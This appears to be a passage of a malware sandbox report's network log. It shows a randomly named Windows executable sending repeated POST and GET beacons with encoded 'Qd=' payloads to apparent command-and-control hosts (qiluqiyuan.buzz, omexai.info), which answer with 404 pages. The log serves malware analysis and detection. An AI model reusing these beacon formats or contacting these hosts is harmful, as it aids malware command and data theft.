                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        21192.168.2.464999161.97.168.245804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:45:34.016371965 CEST721OUTPOST /p6o9/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 199
                        Host: www.qiluqiyuan.buzz
                        Origin: http://www.qiluqiyuan.buzz
                        Referer: http://www.qiluqiyuan.buzz/p6o9/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 55 6b 44 66 62 38 68 68 45 7a 76 38 4b 66 53 32 54 4d 6c 58 45 4d 6c 56 79 74 43 6a 6d 61 7a 54 59 6a 5a 75 55 52 77 42 66 72 78 30 62 51 4f 71 34 34 79 68 75 56 50 7a 71 31 38 75 6e 75 2f 72 65 38 56 61 56 64 6b 48 52 59 75 50 4f 62 49 48 67 66 47 64 78 57 78 4c 30 62 4a 62 70 68 79 48 4a 33 6c 55 75 47 57 50 34 55 37 77 50 52 63 2b 66 68 6a 6d 4f 73 2f 38 79 39 39 39 31 4f 44 35 69 77 73 56 35 7a 53 79 63 79 37 31 4b 6d 78 4e 63 39 4b 2b 61 45 43 6f 42 67 50 61 6f 46 6b 49 58 78 54 58 48 6a 2f 53 4e 66 35 6f 5a 68 55 44 65 49 54 47 36 76 74 48 69 65 53 79 33 6a 69 55 76 41 3d 3d
                        Data Ascii: Qd=UkDfb8hhEzv8KfS2TMlXEMlVytCjmazTYjZuURwBfrx0bQOq44yhuVPzq18unu/re8VaVdkHRYuPObIHgfGdxWxL0bJbphyHJ3lUuGWP4U7wPRc+fhjmOs/8y9991OD5iwsV5zSycy71KmxNc9K+aECoBgPaoFkIXxTXHj/SNf5oZhUDeITG6vtHieSy3jiUvA==
                        Sep 3, 2024 10:45:34.598315954 CEST1236INHTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Tue, 03 Sep 2024 08:45:34 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        ETag: W/"66cd104a-b96"
                        Content-Encoding: gzip
                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                        Sep 3, 2024 10:45:34.598408937 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        22192.168.2.465000161.97.168.245804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:45:36.582380056 CEST741OUTPOST /p6o9/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 219
                        Host: www.qiluqiyuan.buzz
                        Origin: http://www.qiluqiyuan.buzz
                        Referer: http://www.qiluqiyuan.buzz/p6o9/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 55 6b 44 66 62 38 68 68 45 7a 76 38 4b 38 61 32 57 72 35 58 4d 4d 6c 53 33 74 43 6a 39 4b 7a 58 59 6a 56 75 55 55 41 72 66 5a 6c 30 62 79 57 71 33 5a 79 68 37 56 50 7a 6c 56 38 72 6a 75 2f 77 65 38 5a 38 56 64 6f 48 52 59 36 50 4f 65 6b 48 67 4d 2b 53 77 47 78 4a 38 37 4a 5a 6b 42 79 48 4a 33 6c 55 75 47 43 31 34 55 6a 77 4f 68 4d 2b 4f 31 33 70 48 4d 2f 7a 6c 4e 39 39 34 75 44 39 69 77 74 43 35 79 65 59 63 30 6e 31 4b 6e 68 4e 63 4d 4b 78 42 30 43 75 65 77 4f 32 68 68 39 6d 62 6a 4b 39 48 51 4c 64 4f 73 39 4f 52 48 46 5a 50 35 79 52 6f 76 4a 30 2f 5a 62 47 36 67 66 64 30 4c 68 63 39 35 6d 6f 48 71 68 67 57 58 56 47 37 75 61 44 75 46 6f 3d
                        Data Ascii: Qd=UkDfb8hhEzv8K8a2Wr5XMMlS3tCj9KzXYjVuUUArfZl0byWq3Zyh7VPzlV8rju/we8Z8VdoHRY6POekHgM+SwGxJ87JZkByHJ3lUuGC14UjwOhM+O13pHM/zlN994uD9iwtC5yeYc0n1KnhNcMKxB0CuewO2hh9mbjK9HQLdOs9ORHFZP5yRovJ0/ZbG6gfd0Lhc95moHqhgWXVG7uaDuFo=
                        Sep 3, 2024 10:45:37.169241905 CEST1236INHTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Tue, 03 Sep 2024 08:45:37 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        ETag: W/"66cd104a-b96"
                        Content-Encoding: gzip
                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                        Sep 3, 2024 10:45:37.169294119 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        23192.168.2.465001161.97.168.245804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:45:39.124440908 CEST10823OUTPOST /p6o9/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 10299
                        Host: www.qiluqiyuan.buzz
                        Origin: http://www.qiluqiyuan.buzz
                        Referer: http://www.qiluqiyuan.buzz/p6o9/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 55 6b 44 66 62 38 68 68 45 7a 76 38 4b 38 61 32 57 72 35 58 4d 4d 6c 53 33 74 43 6a 39 4b 7a 58 59 6a 56 75 55 55 41 72 66 5a 39 30 63 42 65 71 32 36 4b 68 70 6c 50 7a 73 31 38 71 6a 75 2f 78 65 38 42 34 56 64 31 79 52 61 43 50 50 34 77 48 33 4e 2b 53 35 47 78 4a 77 62 4a 55 70 68 7a 4e 4a 30 4e 51 75 47 53 31 34 55 6a 77 4f 6a 45 2b 4f 68 6a 70 42 4d 2f 38 79 39 39 35 31 4f 44 46 69 77 45 33 35 79 4b 69 62 48 2f 31 4b 47 52 4e 50 65 53 78 63 45 43 73 66 77 4f 75 68 6b 6c 6c 62 6a 57 62 48 51 4f 77 4f 72 31 4f 54 42 73 6e 59 61 2b 54 33 64 52 61 73 72 37 61 37 6e 6d 51 77 70 70 31 74 4a 79 6b 66 34 39 33 55 33 51 38 72 75 69 68 77 31 4b 76 69 58 53 43 38 39 38 54 47 4f 33 4c 66 4b 42 44 39 6e 41 6b 61 39 52 64 4d 44 66 6b 65 76 63 45 67 69 59 41 57 55 61 36 6b 61 45 64 75 74 43 32 54 49 63 63 79 50 73 65 64 59 61 52 62 6d 2f 53 53 77 32 75 67 54 79 32 70 58 69 48 6f 35 67 53 65 4e 59 70 61 6b 44 37 64 37 6d 56 79 68 74 41 41 38 66 36 72 42 76 52 68 4e 52 52 75 48 71 37 43 42 59 44 4d 6b 36 [TRUNCATED]
                        Data Ascii: Qd=UkDfb8hhEzv8K8a2Wr5XMMlS3tCj9KzXYjVuUUArfZ90cBeq26KhplPzs18qju/xe8B4Vd1yRaCPP4wH3N+S5GxJwbJUphzNJ0NQuGS14UjwOjE+OhjpBM/8y9951ODFiwE35yKibH/1KGRNPeSxcECsfwOuhkllbjWbHQOwOr1OTBsnYa+T3dRasr7a7nmQwpp1tJykf493U3Q8ruihw1KviXSC898TGO3LfKBD9nAka9RdMDfkevcEgiYAWUa6kaEdutC2TIccyPsedYaRbm/SSw2ugTy2pXiHo5gSeNYpakD7d7mVyhtAA8f6rBvRhNRRuHq7CBYDMk6sfUKGVZ6xIxhp7U+sM6ioGiuTi2NtZhaVhml7wE+nbKsGHAB6Zm86wPJ/GwGRMPVO+20kd0CYDSncgSIsfwMV//jvS1h91VT8PMHbP9P/lknJ15dGcS3drqGS6fsnPul9U6X9Eoxm1CHS6tLOl9/kvhEUdIz4ttFMM39Gwq8sWDejVgq2NhFGfXGiDjuPD/qetj8VgfPU9X4VdukTjsm2Jm48hocCDkEJoWYB8Gk2MLBXFgGnzM+1kSKL/srRf4k6QrQbLTxbdddj9MB3Xb3Irubk+G2pcAdAbF+E/74N9/M7RgbmjtqWW49x3T8yQnwD6js+ad1rxn0bXDwMdwG+JrMLsSSnuBFtx3kLg1rT6A1NcPsm26ndmxnqIwBqeTDJcy32GO5v/t6PSmoST0NK897GfUhUYuF3IgsQOqMiPxvww/2EIqJa7obDP74ygvGA1xGQJEo4fS4TPLQfN8bLPov362vx2Gkv48HMCuIQT+PUi8VW0Idw0es8EFx1+DdpBf6QwB2x43MZc+p7g5EUJeNRdHBzWwxUEQOdz0CrYd7KSyfI+VPTF5N/y56oJS0YE8DHjDpQtpvZ3jnc18HMK2vn0UO9CdQA0xBo/3Qe8qrdnMu4fR9E6ZSJXXlF4vNnN/qM+ND7QPEurOAHKnWvmmjmaftoMfDYi [TRUNCATED]
                        Sep 3, 2024 10:45:39.695467949 CEST1236INHTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Tue, 03 Sep 2024 08:45:39 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        ETag: W/"66cd104a-b96"
                        Content-Encoding: gzip
                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                        Sep 3, 2024 10:45:39.695763111 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        24192.168.2.465002161.97.168.245804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:45:41.674700022 CEST445OUTGET /p6o9/?Qd=Zmr/YL1wBhH5EvOYa+lfR7FMwZSqpeTcexp1DhQNUfR7ECek+Jud5GyO11J5h9itVrdZedwNG4+zKYxY7NG/xiBUzJxWpUvsREBgoFXOyFDTB09pGlr6B+k=&0z=mDcdcR8 HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.qiluqiyuan.buzz
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:45:42.270127058 CEST1236INHTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Tue, 03 Sep 2024 08:45:42 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 2966
                        Connection: close
                        Vary: Accept-Encoding
                        ETag: "66cd104a-b96"
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                        Sep 3, 2024 10:45:42.270142078 CEST224INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                        Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-tex
                        Sep 3, 2024 10:45:42.270152092 CEST1236INData Raw: 74 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 30 37 30 37 30 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 31 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 35 65 6d 3b 0a 09 09 09 09 6c 69
                        Data Ascii: t {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;line-height: 20px;}.footer {margin-top: 40px;font-size: 0.7em;}.animate__delay-1s {animation-delay: 1s;}@keyframes fadeIn
                        Sep 3, 2024 10:45:42.270163059 CEST224INData Raw: 2d 32 30 2e 36 33 35 2d 34 36 2d 34 36 2d 34 36 7a 22 0a 09 09 09 09 09 09 09 3e 3c 2f 70 61 74 68 3e 0a 09 09 09 09 09 09 3c 2f 73 76 67 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 63 6c 61 73 73 3d 22 61 6e 69 6d 61 74
                        Data Ascii: -20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found</h1><div class="description-text animate__animated animate__fadeIn animate__delay-1s">
                        Sep 3, 2024 10:45:42.270172119 CEST250INData Raw: 09 3c 70 3e 4f 6f 70 73 21 20 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 74 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 3c 70 3e 50 6c 65 61 73 65 20 63
                        Data Ascii: <p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></div></div></body><


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        25192.168.2.4650033.33.130.190804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:45:47.317398071 CEST709OUTPOST /45sz/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 199
                        Host: www.omexai.info
                        Origin: http://www.omexai.info
                        Referer: http://www.omexai.info/45sz/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 39 6d 34 57 67 54 43 6a 6f 2b 46 47 54 44 65 35 51 68 7a 66 51 6a 59 5a 2f 6d 2f 6b 50 4b 59 72 35 4e 42 41 52 55 74 58 34 46 4b 51 43 67 58 39 72 56 56 4e 66 4d 72 73 4a 58 70 45 56 45 2b 4f 4f 54 4b 6d 6a 68 71 31 4f 4c 68 45 4e 48 30 41 45 37 30 44 68 74 62 74 42 37 45 39 39 78 4e 6a 69 2f 4d 67 44 4b 53 30 4a 68 33 7a 57 68 4f 77 72 71 6a 75 7a 63 51 50 6b 6e 65 51 6d 44 53 39 59 38 37 4a 67 71 66 6b 30 32 66 61 7a 71 78 76 2b 48 30 71 2b 52 71 69 68 6e 31 45 45 51 74 65 43 59 67 72 33 4f 48 49 68 61 4c 57 59 56 71 62 70 36 4f 2f 78 66 47 64 58 6d 55 71 39 62 69 73 56 77 3d 3d
                        Data Ascii: Qd=9m4WgTCjo+FGTDe5QhzfQjYZ/m/kPKYr5NBARUtX4FKQCgX9rVVNfMrsJXpEVE+OOTKmjhq1OLhENH0AE70DhtbtB7E99xNji/MgDKS0Jh3zWhOwrqjuzcQPkneQmDS9Y87Jgqfk02fazqxv+H0q+Rqihn1EEQteCYgr3OHIhaLWYVqbp6O/xfGdXmUq9bisVw==


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        26192.168.2.4650043.33.130.190804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:45:49.862255096 CEST729OUTPOST /45sz/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 219
                        Host: www.omexai.info
                        Origin: http://www.omexai.info
                        Referer: http://www.omexai.info/45sz/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
